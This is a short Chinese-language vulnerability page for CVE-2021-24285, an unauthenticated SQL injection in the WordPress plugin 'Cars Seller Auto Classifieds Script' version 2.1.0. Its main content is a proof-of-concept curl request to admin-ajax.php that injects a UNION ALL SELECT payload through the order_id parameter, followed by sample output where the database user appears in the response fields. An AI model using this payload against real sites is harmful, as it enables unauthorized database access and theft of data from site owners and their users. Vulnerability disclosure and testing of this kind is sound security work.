# CVE-2021-24285 WordPress SQL注入漏洞
==簡介==
插件名稱:wp-plugin:cars-seller-auto-classifieds-script
受影響的版本:2.1.0(如果有,則可能是較低版本)
漏洞:注入
所需的最低訪問級別:未認證
==POC==
curl 'http:///wp-admin/admin-ajax.php' \ --data-raw 'action=request_list_request&order_id=-1662 UNION ALL SELECT NULL,NULL,current_user(),current_user(),current_user(),NULL,current_user(),current_user(),NULL-- -' \ --compressed \ --insecure
Request Details
Request Id | |
Car Title | Untitled |
Name | bob@localhost bob@localhost |
bob@localhost | |
Phone | bob@localhost |
Message | bob@localhost |
Reply |
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容